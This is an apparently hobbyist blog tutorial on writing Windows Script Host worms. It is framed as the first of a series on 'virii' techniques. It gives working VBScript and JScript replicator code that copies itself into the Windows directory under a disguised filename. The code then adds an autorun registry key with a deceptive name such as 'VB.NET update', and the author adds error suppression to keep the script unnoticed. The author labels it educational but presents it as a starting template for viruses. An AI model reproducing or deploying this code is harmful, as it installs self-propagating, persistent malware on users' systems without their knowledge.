Microsoft® Windows® Script Host (WSH) is a language-independent scripting host for Windows Script compatible scripting engines. It brings simple, powerful, and flexible scripting to the Windows 32-bit platform, allowing you to run scripts from both the Windows desktop and the command prompt.
Windows Script Host is ideal for non-interactive scripting needs, such as logon scripting, administrative scripting, and machine automation. It is also pretty straight foward when we want to create some virus or worm.
In lots of virii colections around the internet we can find lots and lots of malware (being it worms for adware, for botnets, etc..) written in VBS because it is simple, has ActiveX objects for inumerous tasks (sockets, internet explorer manipulation, shell usage, register manipulation, mail senders, etc…) and because it is easy to learn…it is mainly Basic!
For the next series of posts I will try to show you the basic functions behind many well known malware scripts.
Let us first see the WScript Object. The WScript object is the root object of the Windows Script Host object model hierarchy. It never needs to be instantiated before invoking its properties and methods, and it is always available from any script file. From this object we will use the following property and method:
- ScriptFullName: Returns the full path of the currently running script.
- CreateObject(strProgID[,strPrefix]): Creates a COM object.
Now we can create another kind of object, WScript.Shell. You create a WshShell object whenever you want to run a program locally, manipulate the contents of the registry, create a shortcut, or access a system folder. The WshShell object provides the Environment collection. This collection allows you to handle environmental variables (such as WINDIR, PATH, or PROMPT) which proves itself very usefull when creating virii code. We will use simple methods from this object:
- Run(strCommand, [intWindowStyle], [bWaitOnReturn]): Runs a program in a new process.
- RegWrite(strName, anyValue [,strType]): Creates a new key, adds another value-name to an existing key (and assigns it a value), or changes the value of an existing value-name.
- ExpandEnvironmentStrings(strString): Returns an environment variable’s expanded value
Now, by combining these simple methods we can quickly mimic the basic starting structure of a simple vbs worm. The process is simple:
- create a copy of itself on the windows directory
- add a key to the windows registry in order to launch the script whenever the operating system boots.
The following educational code shows that process:
' sample VBS replicator script ' create a WScript.Shell object Set oShell = WScript.CreateObject ("WScript.Shell") ' replicate the script to windows directory using the environment var %WinDir% oShell.Run "cmd /Cs COPY """ & WScript.ScriptFullName & """ """ & oShell.ExpandEnvironmentStrings("%WinDir%") & "\vb32qwin.vbs""" ' write a key to the registry in order to launch the script on every os boot oShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\VB.NET update", "wscript /b " & oShell.ExpandEnvironmentStrings("%WinDir%") & "\vb32qwin.vbs" , "REG_SZ"
This code, without any payload, is in fact the basic initial process for almost any vbs worm or virus coded nowadays. Or at least for the ones i’ve found in many recent virii colections.
One interesting regard is that the same code could be made in JavaScript (since windows runs both .vbs scripts and .jse) with slight changes of syntax:
// sample javaScript replicator script // create a WScript.Shell object var oShell = new ActiveXObject("WScript.Shell"); // replicate the script to windows directory try { oShell.Run("cmd /C COPY \"" + WScript.ScriptFullName + "\" \"" + oShell.ExpandEnvironmentStrings("%WinDir%") + "\\JSwin32.jse\""); } catch(e) {} // write a key to the registry try { oShell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\JavaScript Runtime", "\"wscript /b " + oShell.ExpandEnvironmentStrings("%WinDir%") + "\\JSwin32.jse\"" , "REG_SZ"); } catch(e) {}
I’ve just add a try…catch block in order to preserve the invisibility of our script, if some error during the writing occours then nothing happens.
On further posts I will now only write the code in one of these languages but you can now choose for your self which one to use.
